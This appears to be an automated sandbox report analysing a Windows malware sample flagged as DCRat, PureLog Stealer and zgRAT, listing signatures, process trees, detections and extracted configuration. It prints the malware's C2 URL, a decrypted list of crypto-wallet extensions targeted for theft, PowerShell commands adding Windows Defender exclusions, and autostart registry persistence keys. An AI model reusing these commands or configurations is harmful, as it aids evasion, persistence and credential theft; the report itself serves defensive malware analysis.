Windows Analysis Report
6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe

Overview

General Information

Sample name: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
Analysis ID: 1584173
MD5: f9589e19d9a2ffbfacb439b029ab4f06
SHA1: 0eb7246ee67d0a7289a1eb5d76a4df8f1c6a4a72
SHA256: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746bf082418d809b9763156
Tags: exe, Zyklon, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Powershell In Registry Run Keys
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
    • csc.exe (PID: 7548 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7604 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DC7.tmp" "c:\Windows\System32\CSC63445EDF6B1F4E2FAF4EDB3743FA6EFB.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 7812 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7652 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7820 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\services.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7836 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\smartscreen.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7860 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7880 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8136 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B7heSupDrt.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 3104 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7520 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • services.exe (PID: 5344 cmdline: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • services.exe (PID: 8020 cmdline: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • services.exe (PID: 8096 cmdline: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • smartscreen.exe (PID: 6120 cmdline: "C:\Program Files (x86)\windows nt\smartscreen.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • smartscreen.exe (PID: 1436 cmdline: "C:\Program Files (x86)\windows nt\smartscreen.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • System.exe (PID: 6720 cmdline: "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • System.exe (PID: 7232 cmdline: "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • System.exe (PID: 5796 cmdline: "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • svchost.exe (PID: 5956 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • services.exe (PID: 6020 cmdline: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • smartscreen.exe (PID: 3488 cmdline: "C:\Program Files (x86)\windows nt\smartscreen.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • System.exe (PID: 6664 cmdline: "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • services.exe (PID: 7056 cmdline: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • smartscreen.exe (PID: 1144 cmdline: "C:\Program Files (x86)\windows nt\smartscreen.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • cleanup
{"C2 url": "http://154.29.71.9/eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Windows NT\smartscreen.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Windows NT\smartscreen.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000000.1655633091.0000000000132000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.1744220158.00000000127A1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe PID: 7416 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: services.exe PID: 5344 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.0.6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe.130000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe.130000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                            System Summary

                            Source: File created, Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessId: 7416, TargetFilename: C:\Program Files (x86)\windows sidebar\Gadgets\services.exe
                            Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe", ParentImage: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ParentProcessId: 7416, ParentProcessName: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe', ProcessId: 7812, ProcessName: powershell.exe
                            Source: Process started, Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe", CommandLine: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, NewProcessName: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, OriginalFileName: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe", ProcessId: 8020, ProcessName: services.exe
                            Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessId: 7416, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System
                            Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessId: 7416, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                            Source: Process started, Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe", ParentImage: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ParentProcessId: 7416, ParentProcessName: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline", ProcessId: 7548, ProcessName: csc.exe
                            Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe", ParentImage: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ParentProcessId: 7416, ParentProcessName: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe', ProcessId: 7812, ProcessName: powershell.exe
                            Source: Registry Key set, Author: frack113, Florian Roth (Nextron Systems): Data: Details: "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessId: 7416, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System
                            Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessId: 7416, TargetFilename: C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline
                            Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe", ParentImage: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ParentProcessId: 7416, ParentProcessName: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe', ProcessId: 7812, ProcessName: powershell.exe
                            Source: Process started, Author: vburov: Data: Command: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe", CommandLine: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, NewProcessName: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, OriginalFileName: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe", ProcessId: 8020, ProcessName: services.exe

                            Data Obfuscation

                            Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe", ParentImage: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ParentProcessId: 7416, ParentProcessName: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline", ProcessId: 7548, ProcessName: csc.exe
                            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                            2025-01-04T14:52:18.763665+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 154.29.71.9 | 80 | TCP

                            AV Detection

                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Avira: detected
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\B7heSupDrt.bat, Avira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: 00000000.00000002.1744220158.00000000127A1000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: DCRat {"C2 url": "http://154.29.71.9/eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe, ReversingLabs: Detection: 76%
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, ReversingLabs: Detection: 76%
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, ReversingLabs: Detection: 76%
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe, ReversingLabs: Detection: 76%
                            Source: C:\Users\user\Desktop\AIflJiPS.log, ReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\CeJjFnSo.log, ReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\KpOqUOcm.log, ReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\PxIPwdiO.log, ReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\SVvXiHdY.log, ReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\bZqOSDZv.log, ReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\fePfJVil.log, ReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\hFbfZzNA.log, ReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\npUmXvsj.log, ReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\qaACfJCc.log, ReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\rWndvGZf.log, ReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\rxSvtOmf.log, ReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\syOLALyL.log, ReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\ujtbHYJE.log, ReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\urdulIjK.log, ReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\zNoaAjFw.log, ReversingLabs: Detection: 25%
                            Source: C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe, ReversingLabs: Detection: 76%
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Virustotal: Detection: 60%
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ReversingLabs: Detection: 76%
                            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exe, Joe Sandbox ML: detected
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, Joe Sandbox ML: detected
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe, Joe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\CeJjFnSo.log, Joe Sandbox ML: detected
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Joe Sandbox ML: detected
                            Source: 00000000.00000002.1744220158.00000000127A1000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
                            Source: 00000000.00000002.1744220158.00000000127A1000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["jlV92PdlAGYlvLQoQswNOvFDvusA9aD0ZFVG44nno5F3WFl92D4cnoFxfSOHgdmjDiMpzJuVFIiTqLqpIsH6fkNv9iklqfGKSf0y35JtSiXeFwGTli8xVqEcUbqRiIpj","9689fee2575b041d566fe4e90198abfbc11de5c33209f1394c6288edd57e1bda","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJeElpd2lJaXdpWlhsSmQwbHFiMmxsTVU1YVZURlNSbFJWVWxOVFZscEdabE01Vm1NeVZubGplVGhwVEVOSmVFbHFiMmxhYlVaell6SlZhVXhEU1hsSmFtOXBXbTFHYzJNeVZXbE1RMGw2U1dwdmFXUklTakZhVTBselNXcFJhVTlwU2pCamJsWnNTV2wzYVU1VFNUWkpibEo1WkZkVmFVeERTVEpKYW05cFpFaEtNVnBUU1hOSmFtTnBUMmxLYlZsWGVIcGFVMGx6U1dwbmFVOXBTakJqYmxac1NXbDNhVTlUU1RaSmJsSjVaRmRWYVV4RFNYaE5RMGsyU1c1U2VXUlhWV2xNUTBsNFRWTkpOa2x1VW5sa1YxVnBURU5KZUUxcFNUWkpibEo1WkZkVmFVeERTWGhOZVVrMlNXNVNlV1JYVldsTVEwbDRUa05KTmtsdVVubGtWMVZwWmxFOVBTSmQiXQ=="]
                            Source: 00000000.00000002.1744220158.00000000127A1000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://154.29.71.9/eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/","DbCdn"]]
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Directory created: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Directory created: C:\Program Files\WindowsPowerShell\Configuration\Registration\27d1bcfc3c54e0
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.pdb source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, 00000000.00000002.1718805809.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp

                            Spreading

